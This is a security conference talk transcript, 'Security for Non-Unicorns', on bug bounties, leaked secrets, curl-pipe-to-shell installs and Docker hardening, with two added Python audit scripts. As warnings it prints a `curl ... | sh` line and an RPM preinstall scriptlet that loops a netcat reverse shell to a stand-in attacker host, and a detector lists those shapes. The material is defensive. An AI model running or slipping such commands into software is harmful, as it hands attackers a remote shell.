
Security for non-unicorns

Bea Hughes
September 25, 2015


Operability.io September 2015.

Security is becoming quite the thing nowadays; everyone wants to have one of them. The mantra that things should be built with security in mind and can't be plastered on later is a very important one if you're based in Silicon Valley and are about to write "teh new hotness", but what happens if your company is older than, say, 6 months? You already have some legacy systems and code. I'll be talking about how it's possible to unearth some of these things, what happens when you do uncover them, how to stop them happening, and coping strategies for dealing with them.


Transcript

  1. Security For Non-Unicorns
    1 https://www.etsy.com/listing/205741051/unicorn-dog-hat-rainbow-unicorn-dog
    @benjammingh for Operability.io 1

  2. Who's this clown? 2
    • Infrastructure security charlatan at Etsy
    • Operations monkey at Puppet Labs
    • Survived a bunch of startups in London. (some of them still have websites...)
    • Has far too many opinions about pretty much everything on the TwitterNet @benjammingh
    2 https://twitter.com/skullmandible/status/411281851131523072

  3. Unicorns?

  4. Setlist
    • The problem(™).
    • The solution(s)(™).
    • The wrap up.
    • Rapturous applause.
    • We all go home/dance parties/our secret lives as superheroes & heroines.

  5. The problem
    security is hard.

  6. From tiny seeds, do mighty acorns grow.
    • PinkiePwn's 6 small bugs in Chrome to full sandbox escape
    • Egor Homakov's 5 small bugs in Github to full private access on GitHub
    • from XSS to remote code execution in under an hour
    • Username & password stolen for HVAC system leads to $160+ Million Target breach.

  7. Things that aren't security are hard too.

  8. Computering is hard.
    No. 1 takeaway for security types is a sense of perspective.

  9. Security people aren't great secure coders.
    • Snort: 10 CVEs, Wireshark: 322! CVEs
    • Joxean Koret on Breaking Antivirus software
    • Security Firm Bit9 Hacked, Used to Spread Malware
    • Tavis Ormandy from Project Zero on exploiting ESET
    • BEST! FireEye just running Apache/PHP as root

  10. So who do I trust?
    • No one? Always a great position for security people, who don't want to get paid.
    • Everyone? Do I have a 419 email for YOU!
    • Security vendors? If you have infinite money and no attackers.
    • Attackers!

  11. "You're already being probed for security holes, do you want to know or not?"

  12. Bug bounties 101:
    Have one!
    Bug Crowd vs. HackerOne

  13. Bug bounties 102:
    Prepare a lot.

  14. Bug bounties 103:
    The first few weeks will be hell.

  15. Bug bounties 104:
    Be ready with bees!

  16. Security on the inside

  17. Armadillo security architecture

  18. Cloud

  19. Github

  20. (image-only slide)

  21. But this doesn't happen in real life, right?

  22. (image-only slide)

  23. Go use Gitrob
    • http://michenriksen.com/blog/gitrob-putting-the-open-source-in-osint/
    • https://github.com/michenriksen/gitrob

  24. curl | bash

  25. curl legit.pw/mac | sh

  26. "But I check them, obviously!"

  27. (image-only slide)

  28. curl | bash
    "But this is no worse than packages."
    root# yum install sketchy

  29. curl | bash
    root# rpm -qp --scripts sketchy-1.33-7.rpm
    preinstall scriptlet (using /bin/sh):
    bash -c 'while : ; \
    do \
    nc -e /bin/sh root.legit.pw 2222 ;\
    done'
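
    Added example (not from the talk): the check the slide's `rpm -qp --scripts` invites, as code. It parses the text that command prints and flags the install-time payload shapes shown above, rejoining backslash-continued lines so the wrapped `bash -c` loop is matched as one command; `SAMPLE` is constructed from slide 29 plus a benign ldconfig scriptlet.

```python
import re

# (report label, regex run over one logical line of a scriptlet)
SUSPICIOUS = [
    ("netcat -e: shell attached to a network socket", re.compile(r"\bnc\b.*\s-e\s")),
    ("download piped straight into a shell", re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z|da)?sh\b")),
    ("bash -c wrapping an endless loop", re.compile(r"bash\s+-c\s+'?while\s+:")),
]
# Header shapes `rpm -qp --scripts` prints: "preinstall scriptlet (using /bin/sh):" or "postinstall program: /sbin/ldconfig"
HEADER = re.compile(r"^(\w+) (?:scriptlet \(using [^)]+\)|program): ?(.*)$")

def parse_scriptlets(text):
    """Split `rpm --scripts` output into {scriptlet name: [body lines]}."""
    scripts, name, body = {}, None, []
    for line in text.splitlines():
        m = HEADER.match(line)
        if m:
            if name:
                scripts[name] = body
            name, body = m.group(1), ([m.group(2)] if m.group(2) else [])
        elif name is not None:
            body.append(line)
    if name:
        scripts[name] = body
    return scripts

def join_continuations(lines):
    """Rejoin backslash-continued lines, so a payload wrapped across several
    lines (as on the slide) is matched as the single command it really is."""
    out, buf = [], ""
    for line in lines:
        line = line.rstrip()
        if line.endswith("\\"):
            buf += line[:-1].rstrip() + " "
        else:
            out.append(buf + line)
            buf = ""
    return out + ([buf.rstrip()] if buf else [])

def audit_scriptlets(text):
    """Return (scriptlet, label, offending command) for every pattern hit."""
    return [(name, label, cmd.strip()) for name, body in parse_scriptlets(text).items()
            for cmd in join_continuations(body) for label, rx in SUSPICIOUS if rx.search(cmd)]

# Constructed sample: the slide's preinstall scriptlet plus a benign ldconfig one.
SAMPLE = ("preinstall scriptlet (using /bin/sh):\n"
          "bash -c 'while : ; \\\ndo \\\nnc -e /bin/sh root.legit.pw 2222 ;\\\ndone'\n"
          "postinstall program: /sbin/ldconfig\n")
```

    Feed it `rpm -qp --scripts pkg.rpm` output before the `yum install` on the previous slide; anything it returns is worth a human look, and an empty list is not a clean bill of health, only the absence of these shapes.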

  30. A LIVE DEMO, madness.

  31. Lightweight containers!

  32. chroot(8)

  33. FreeBSD Jails

  34. Solaris Zones

  35. AIX LPAR

  36. (image-only slide)

  37. Is Docker secure?

  38. >30% of Images in Docker Hub Contain High Priority Security Vulns
    - Jayanth Gummaraju, Tarun Desikan and Yoshio Turner from BanyanOps

  39. (image-only slide)

  40. As secure as Vagrant?

  41. But is Docker itself secure?
    • Don't run things as root.
    • No really, stop running things as root.
    • Did I mention not running things as root.
    • It is also not 1999.
    (Docker 1.8 addresses some of this, with its changes to who it runs as)

  42. Securify the Docker.
    • Don't use --privileged.
    • Use --cap-drop all and --cap-add to get the minimum capabilities.
    • Use Docker Notary
    • Use GRSecurity (just do that anyway, if you can.)
    • Use SELinux... I may as well ask for a pony here.
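
    Added example, not from the talk: slides 41 and 42 turned into a check over `docker inspect` output. `audit_running` assumes `docker` is on PATH and is not exercised offline; `SAMPLE` is a constructed fragment in the shape of `docker inspect` JSON.

```python
import json
import subprocess

ROOT_USERS = {"", "0", "root"}  # "" = image default, which is root unless the Dockerfile set USER

def audit_containers(inspect_json):
    """Audit the JSON array that `docker inspect <container>...` prints.
    Returns (container name, problem) pairs; an empty list means it passes."""
    findings = []
    for c in json.loads(inspect_json):
        name = c.get("Name", "?").lstrip("/")
        cfg, host = c.get("Config") or {}, c.get("HostConfig") or {}
        problems = []
        # Slide 41: stop running things as root.
        if (cfg.get("User") or "").split(":")[0] in ROOT_USERS:
            problems.append("runs as root (Config.User empty, 0 or root)")
        # Slide 42: don't use --privileged.
        if host.get("Privileged"):
            problems.append("--privileged: every capability and host device exposed")
        # Slide 42: --cap-drop ALL first, then --cap-add only what is needed.
        drops = {x.upper() for x in host.get("CapDrop") or []}
        adds = {x.upper() for x in host.get("CapAdd") or []}
        if "ALL" not in drops:
            problems.append("default capability set kept (no --cap-drop ALL)")
        if "SYS_ADMIN" in adds or "CAP_SYS_ADMIN" in adds:
            problems.append("CAP_SYS_ADMIN added back, which is most of root anyway")
        # Slide 42: use SELinux. label=disable (older syntax label:disable) switches it off.
        opts = host.get("SecurityOpt") or []
        if any(o.replace(":", "=").lower() == "label=disable" for o in opts):
            problems.append("SELinux labelling disabled (--security-opt label=disable)")
        findings.extend((name, p) for p in problems)
    return findings

def audit_running(*containers):
    """Inspect live containers (assumes docker on PATH; not exercised offline)."""
    out = subprocess.run(["docker", "inspect", *containers], capture_output=True, text=True, check=True)
    return audit_containers(out.stdout)

# Constructed sample in the shape of `docker inspect` output: one container started
# the default way plus --privileged, one started with the slide's hardening flags.
SAMPLE = json.dumps([
    {"Name": "/sketchy", "Config": {"User": ""},
     "HostConfig": {"Privileged": True, "CapAdd": None, "CapDrop": None,
                    "SecurityOpt": ["label=disable"]}},
    {"Name": "/web", "Config": {"User": "1000:1000"},
     "HostConfig": {"Privileged": False, "CapAdd": ["NET_BIND_SERVICE"],
                    "CapDrop": ["ALL"], "SecurityOpt": None}},
])
```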

  43. Summary
    • Computers are apparently hard.
    • Security is clearly harder still, obv.
    • Actually, trust and humans are hard.
    • The typing is the easy bit. (ish)

  44. More Summary
    • Complex systems lead to much more complex security problems. (see OAuth)
    • Annual pen-tests don't scale, bug bounties can.
    • Attackers are mining any public info you have (GitHub, S3)
    • I beg you to stop trusting curl.
    • Docker and security can be used in the same sentence.

  45. Thank you!
    Twidder: @benjammingh
    LinkedIn: lnkdin.me/p/benyeah
    FidoNet: 2:254/524.13
    JitHub: github.com/barn
    SpeakerDeck: speakerdeck.com/barnbarn
    Etsy: Careers CodeAsCraft